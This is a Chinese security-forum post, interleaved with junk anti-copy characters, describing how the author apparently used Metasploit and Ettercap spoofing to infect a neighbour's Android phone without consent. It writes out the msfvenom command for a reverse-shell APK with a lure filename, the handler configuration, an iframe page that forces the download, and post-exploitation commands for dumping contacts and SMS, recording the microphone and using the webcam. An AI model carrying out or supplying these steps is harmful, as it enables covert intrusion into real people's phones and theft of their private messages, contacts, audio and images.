找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1640|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

) Y9 L- t9 Q3 [7 n 五、msf+ettercap入侵邻居安卓手机 2 s/ |: v, E, n

7 f; k Q, _! |7 C1 G

' `" \" d8 d) z# H; H6 @ 首先启动msf $ E$ }# K" R% E' @% y

4 ]8 g% F. b: ?6 O. \% P9 L

" Y) T! ]8 |! M O 先用kali生成一个安卓木马,如下命令: + u. w8 D. E8 ~' i/ c* k0 s

? a# v: z9 G! i2 ?

, `" R. j9 ^. O Z Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk & _( P: l) L" i( z) K

8 m; S$ Q; P: ? @) b' j

. }7 F) b4 l6 i( i 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ! m+ @9 X" ^7 ], r

* s- v# u3 q2 I( _" o/ d2 f

$ R( ^% w7 p: A( K7 B 然后进入msf - l9 V9 R, R6 X* D4 J" ~9 \: y

4 j8 t6 V3 h( |* |

& i+ A0 z( I2 ~$ A use exploit/multi/handler 6 J) l" W7 h. ?

. l1 ]/ w+ N+ I; a* I

# T) }) V) h% w7 s, D6 Z' m set payload android/meterpreter/reverse_tcp $ Z" k; Y5 J- f. \) r) T

& G5 o8 [) v' u% ?$ r5 I8 W

" c; T9 o% Z2 |: b9 Y set LHOST 192.168.0.109 //ipkailiip : s k; u$ X0 B) g

3 o4 B4 I, ^9 F7 [2 x1 {

5 J( ]( k- }9 X. Y" x' @ set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ' q+ |0 T, f) p) R, e& u

( [+ Z' |4 n( Q( P1 U

. t& `, M5 C# U0 n: O; G: b7 `2 z Exploit 9 T9 A: p9 E+ p( Q

8 D" d4 t1 `' M# c( i

. a* F1 y0 @' q5 c   ' V o) I+ ^ i4 b* B6 ]! ?

0 [7 Y" K" L2 O* q9 z p) z3 S& W2 _

9 h+ D; t. a1 H: U 下面我们开启ettercap -G ' u0 Z* @7 r2 @8 `/ R4 p1 H* Q/ B

3 E3 J1 W: L9 i; r3 E. k

. F9 k# a0 n/ ]3 R 我物理IP & N1 s: t1 R; }- q L- b h

" H) r6 @7 z5 k, j

2 B' d3 X! c6 ?8 D% Q7 `$ b( p   & p( i6 S+ S- T4 ~$ [: X, y

$ U7 l( }. M: q5 p

1 [. X* h) n0 i9 x" ^7 a% ]% h 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, + w5 r3 q* m: r5 U& ?9 `$ B* s7 Y l

9 Q" l& G( j! |

2 n0 h' Q# O$ z( U5 Q7 Z 下面我们来设置一下 8 ~1 l) z1 P& t3 X4 U0 j3 G4 K

1 O- N/ ~/ n$ C7 j1 w' G$ u# W2 x

0 {( {* @$ a! a. j7 J! w) {5 |   3 t- h6 F; D0 W

- B/ {5 B D, y1 {9 M

0 r a O* n& a9 ], _% h: B 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, $ B# s* V7 |5 v1 N0 g+ O

3 e$ u! l4 z x3 S

5 v8 V' P5 R: F5 {$ k8 v5 [8 |1 E   9 U# n: M+ C- z

I0 W; ^& _+ t9 P2 s1 {3 p# w+ l

4 k5 n9 q( V* `5 Y, a   # S( v% `' f" Z& z" l( h$ | [

b. \6 v1 e! a* F1 r: {7 J% ]

& T6 X3 H/ q/ P$ W3 O- X0 I   3 u9 ]4 R$ Q$ M

8 ?1 U# X- D j: z: G

4 }2 w& V7 S# z) F   ( R O! B3 J: h. x: `$ N

* }9 e. ?" N/ o3 N

( Y6 _7 h, u! ^$ @   ! N4 M) E* U/ y+ K! y' ], s

+ u* J9 f0 D1 \* C; R

& F. O4 V# ?7 i0 {: ?   X( d) o" K/ j9 k$ J$ J8 U% g5 K

2 T; w: L2 a# Y8 r% J" y2 y

& u$ u5 K# T5 {9 i1 z   % u3 U" }7 u. Q8 r# C2 l, Q2 d0 E

" z, A$ I- o4 x$ Q

R4 W. a+ F a; `2 }- K   # Z# I9 k m" G2 {' |0 p+ V

9 d* P1 [7 c5 e$ u& v/ m* Z& h

4 {( |4 K& T- H$ A$ J: |& |, z   g6 I) L# U7 W

- ^) ?4 l4 K; z/ b8 h- j; b. l

4 G) ^$ C8 P& D# K   9 B- V0 x1 g' R& k/ k& L% c1 l8 I

! ?, X. c! r- u' g) E; \0 M: E. w; }

' e, B ]9 D- b, X& i1 Y   . R4 q) E$ P( g: R

3 U' }2 D+ K$ K& n* P. m. N0 c

- x$ u9 \$ w1 g5 f7 ] `* y- t   ' P+ y1 y% t2 Z1 K5 t, }& b" T

$ k, c; H& S+ C$ W

" l* C3 e. T) N8 K' t/ K   . N# f$ e6 T1 t' E- M4 S5 ~

; d& r* W: g& p( \0 S: ^

- ^+ z% ]# `7 d: ]" B @1 p% _ 下面我们开始攻击 1 s! d0 ^* I7 E3 J/ g7 E

0 F' p2 M/ m5 R; i8 V7 p6 Z* [) i; V

2 A% F! ~ A0 V: a! M: a4 _) n   ' L2 e9 C. e6 R$ A7 F* r& u/ T

2 N3 w% @- Z- Q6 G+ \+ Q9 W. f. p, R

4 |& S! J; g6 ]% S/ Q: _   " g# S7 H" h8 _5 f. }

3 X7 ]$ y: w M; B7 K1 s6 T

" y \0 G% O3 c8 a) c   . } Z- N8 V! I, y8 W& A9 K

, A8 i7 }1 {7 D, P- v

. G$ |1 F$ U* G: N! V) k" X   O2 Y' O( @) v U1 ?

0 X7 Z+ n8 \" ^( z; H1 E5 V# _% \( w

' ~) x' ^5 ]" k3 s$ [1 m$ z$ X7 ^   8 q; P O% w2 v$ @

8 h; ], {' W" q% x

3 a* H% v# I, G( ^ 大概过了5分钟多,发现反弹成功了 g# p ^3 N& F. |2 b4 n. Y* _. G1 i

0 n$ i+ p" ~0 c% Z f

) H" M e8 Z* K0 d: J7 w0 r, g2 {   9 P2 z+ _5 X' Z C1 o2 f

0 G+ F6 {" ]- c$ i( Q9 H2 M% ?7 x

# \$ i8 A% W M; Z; o e0 o; _7 Y   : [5 L0 ~! n5 Z: W. j/ ^( Y

. S3 ^4 |$ q+ ]. z3 M Z7 D( L* S

5 S( W- ]/ b! O1 i/ j' r   3 V9 U" w# T, W) s' v! s* O

# K! b6 P! v8 S' y G5 X

; r9 Q2 K2 x2 H% ]- {   2 \/ a) p6 W' E: Y' `4 ]

# N) s! T6 G& r' e0 I

, l* [2 j( t" N9 V1 A% u5 ^   6 q3 S) h2 C* T1 q D. ^8 m

9 o2 C, H6 n3 M- H2 {) ^

. I2 }- z; {& s9 D   T. b$ l! L5 E, l* `8 [1 ~

8 ~, _5 A/ W+ F5 S

0 ]) W8 w# E6 w3 p; j   7 U7 c- B4 E& J/ I; ~6 ^: ]( S8 ?

2 F5 J$ l, E% ? e% x

" O( L" U. i' n# z. U 执行命令 : k( m- i( y6 U, t7 U

8 B u, H3 W6 p" U. E

( R. \7 m- \) I   9 z+ L: w9 @; I

$ A# m/ i8 a9 `

0 l- L9 E, N' N6 A! |, }! i dump_contacts    --》这个是导出电话 ! ~) C' D4 ?6 n A1 C. a' r

- _# N6 G; ~3 Q$ n$ @8 r

6 k2 B7 b9 ]/ B; m' {" B- U7 C; U# R9 M+ g dump_sms --》这个是导出信息 & o" Z8 i5 p5 b5 U& g

0 g8 J2 O! a$ \/ o: M- R

4 L' k, _& A3 D" | s; E+ r record_mic     Record audio from the default microphone for X seconds 4 i0 ]. \( W8 z$ ]/ y

; y. Q# T& r( {5 g

: |3 g4 G4 x: H" p& i4 t: u: R     webcam_chat    Start a video chat * y% L/ _" |6 V! s

) T. r8 s: L9 K

5 {) f' @! _7 m/ V/ O" ~     webcam_list    List webcams & H! p& C7 d2 J, q9 V9 w

7 H0 B4 j& C- Y2 @

' F$ Q k4 S* C1 g% @$ M+ j3 X O     webcam_snap    Take a snapshot from the specified webcam 7 [5 p0 Z y% I

7 y+ Q4 t2 X5 y+ y+ ]0 V7 K

Z7 B. B6 A4 v; m: Y webcam_stream  lay a video stream from the specified webcam 0 Y( C; @7 G% ^* x

2 h% U0 [' Q' N2 x7 @. _+ L

$ ?5 n1 k' {1 F3 l0 s/ C& m: ~4 M. Z   6 _. S& }! e" d3 f

s, Y7 p- B, a$ y

6 L, k4 @3 m7 b0 `# O" H1 S   $ f* ^+ J) q( @

& M( |/ V4 z0 w+ M

2 F: n+ t9 Z* V5 J+ W+ ^ 我们打开看一下电话薄, , u, o# D- j, `2 v; E0 G I! K8 \

8 D0 `" i" O8 h8 K, H- h2 D+ w) w

" n3 a6 W/ f2 N+ \   1 d# |3 {+ @* y8 a6 b

% W$ v* P; L- r( f! `3 F2 X7 s

( g8 G+ T, G" J1 w1 A! e   9 [2 g, q2 k. o

" E" |5 X. r2 ]+ }' b5 Y& { l

5 X& N6 d7 F! D" U   ' V/ V7 {5 t( G! B" H) n: j

9 ?- G' D; Y& Y( t) l5 ?+ @- u" k

" r5 a b3 C1 o9 p   % `9 T0 b3 ~" Y' W1 `: i1 l

5 F- d, I4 ^! H2 m3 z# z

9 D5 i# U& h( J- F9 V& L0 [! f8 z) z/ Z   $ ~' C# U7 `! \+ z6 p, O" p4 V8 }- G

a/ b: V1 |; L! G: p! e3 f- P

( C8 a4 ^- h: c5 {4 ^/ a2 r' x   3 k/ r% ]# I$ N0 F

$ ?+ U$ x- i9 h7 V# ~

: I6 n: {/ h @7 [ 我们同时欺骗成DroidJack木马,使用方法如图: 8 e/ j- k) r2 ]0 f

+ P( o' W1 F; N1 u

6 M% o- H) O/ [8 q. K7 ]. C* M   2 P# h8 X! ]) [! d6 M

7 F; M0 u+ W3 X0 k4 } z7 U5 G% y

/ C% [% ]$ C; {4 x2 \   , x' w1 E# V6 U; X' Y

0 |( U1 c: V' n& N- I. [

( {5 Y6 _7 o, {- ^7 u   . w8 j7 I K' }7 C

# U3 O4 U( Q, l, v' G: k8 \

* G$ c- l- [1 u 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 * X3 d) r" H* w" m0 f. J7 T/ q

) U8 `4 z' K! ]' R1 O

" _3 T3 i5 x9 p7 `. M: J   / s0 V. U' A7 i) P. j+ A# v1 m! I

1 ?6 O$ H, h/ X# U" ]. D

4 d0 M" @8 L8 v Q5 J   / r& \9 O: H' e# T9 c

; Y$ A' H* i$ P! d* c5 j! K5 N

% Z$ b: ]9 [) I6 K& W/ C: ?; t   ' b; k' v/ [' e4 f3 R/ T

$ o& S0 A7 z7 o+ G: n s

2 N1 K' x6 S$ l& {* z# `0 ` ! B" `. |1 K* y- f! [$ e" [, o

; U' c- f& c9 `1 F( p* s+ |

# v$ k ~8 k5 q4 @. w9 |' L
3 \0 f5 r: S0 @# A$ V& |

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表